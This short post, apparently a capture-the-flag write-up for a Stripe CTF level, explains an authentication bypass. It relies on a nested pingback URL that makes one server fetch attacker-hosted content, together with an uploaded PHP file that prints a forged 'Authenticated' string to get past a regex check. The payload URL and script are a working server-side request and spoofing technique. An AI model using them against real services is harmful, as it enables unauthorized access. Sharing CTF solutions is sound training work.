A key that allows this to happen is that the 'params' variable in the Ruby server will populate from a POST or a GET request. This means we can pass parameters in a URL and allows us to do a pingback in a pingback (Inception).
pingback=https://level05-2.stripe-ctf.com/user-ufaqkqwmgp/?pingback=https://level02-4.stripe-ctf.com/user-zcwpskokgw/uploads/win.php&username=bob&password=bob
This takes the contents of the level02 pagre and puts them in the level5 request, authenticating you with the website. Another small thing to bypass was a regular expression which required the exact string to be on a separate line. The exact string also needed to be preceded by a non-word character (I used a dot). My final script that I uploaded was
<?php echo '<pre>.Authenticated.</pre>'; ?>
-- suntzu_II